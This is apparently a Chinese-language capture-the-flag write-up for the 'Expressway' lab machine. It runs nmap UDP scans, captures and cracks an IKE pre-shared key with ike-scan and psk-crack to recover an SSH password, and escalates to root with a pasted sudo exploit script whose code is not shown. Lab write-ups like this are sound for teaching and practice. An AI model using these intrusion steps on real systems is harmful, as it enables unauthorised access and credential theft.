⚔️Easy_Expressway

# ⚔️Easy_Expressway ![Expressway_T](https://hackmd.io/_uploads/Sk9jkomzZg.png) # 題目：找出使用者標籤及管理者標籤 ![Expressway_IP](https://hackmd.io/_uploads/ryfU9M1gbx.png) ## User Flag ### IP連線先連上VPN，再以 **ping** 指令測試是否與題目提供的IP成功連上，在確認成功後，以 **nmap** 指令掃描題目IP所用到常見的port，以及將IP加入/etc/hosts裡 > ``` > ping 10.10.11.87 > nmap 10.10.11.87 > ``` > ![Expressway_VPN](https://hackmd.io/_uploads/r1dD9MJgWg.png) > ![Expressway_Process1](https://hackmd.io/_uploads/SJdF9fygbx.png) > ![Expressway_Process2](https://hackmd.io/_uploads/BJgc9fkeZl.png) ### Nmap掃描 - - - [Nmap](https://hackmd.io/@p3ysqIUiSkqU-E4s3CtqWQ/r1pi8GyxZe) 因為TCP掃描不理想，以 **nmap** 指令進行UDP掃描，可以發現開啟的500Port，及所使用的IKE協定 > ``` > sudo nmap -sU -sC -sV --top-ports 50 10.10.11.87 > ``` > ![Expressway_Process3](https://hackmd.io/_uploads/HJLjqzJx-x.png) ### IKE - - - [IKE](https://hackmd.io/@p3ysqIUiSkqU-E4s3CtqWQ/HJ3yLVMX-l) > 以 **ike-scan** 指令來獲取相關協商資訊以及PSK參數，之後將PSK參數另存一個psk-hash.txt，並將kali中的rockyou字典檔案解壓至資料夾，再使用 **psk-crack** 進行暴力破解，以取得密碼`freakingrockstarontheroad` > ``` > ike-scan -A -P -M 10.10.11.87 > vim psk-hash.txt > tar xvf /usr/share/wordlists/rockyou.txt.gz > psk-crack -d rockyou.txt psk-hash.txt > ``` > ![Expressway_Process4](https://hackmd.io/_uploads/S15n5f1gZl.png) ### 取得User Flag 與剛剛協商資訊中所獲取的目標`ike@expressway.htb`嘗試建立ssh連線，輸入獲取的密碼，進入後查看目錄列表以cat印出檔案即可獲取User Flag > ``` > ssh ike@expressway.htb > cat user.txt > ``` > ![Expressway_Process5](https://hackmd.io/_uploads/By4gofkl-e.png) ## Root Flag ### 提昇權限以 **sudo** 指令查看自己可使用的管理者權限，但發現沒有相關權限，接著查看指令版本，上網查看是否想相關版本漏洞，接著把破解代碼複製寫入一個新12.sh檔案 ``` sudo -l sudo -V nano 12.sh ``` > ![Expressway_Process6](https://hackmd.io/_uploads/HJ94iGklZg.png) > ![Expressway_Process7](https://hackmd.io/_uploads/r1uHjM1xbg.png) 接著將12.sh增加執行的權限，並執行即可進入管理者權限 > ``` > chmod +x 12.sh > ./12.sh > ``` > ![Expressway_Process8](https://hackmd.io/_uploads/H1gIof1x-g.png) ### 取得User Flag 在進入管理者權限後查看目錄，可以發現一個root目錄，查看底下檔案後，即可獲取Root Flag > ![Expressway_Process9](https://hackmd.io/_uploads/By5LsMyeZg.png)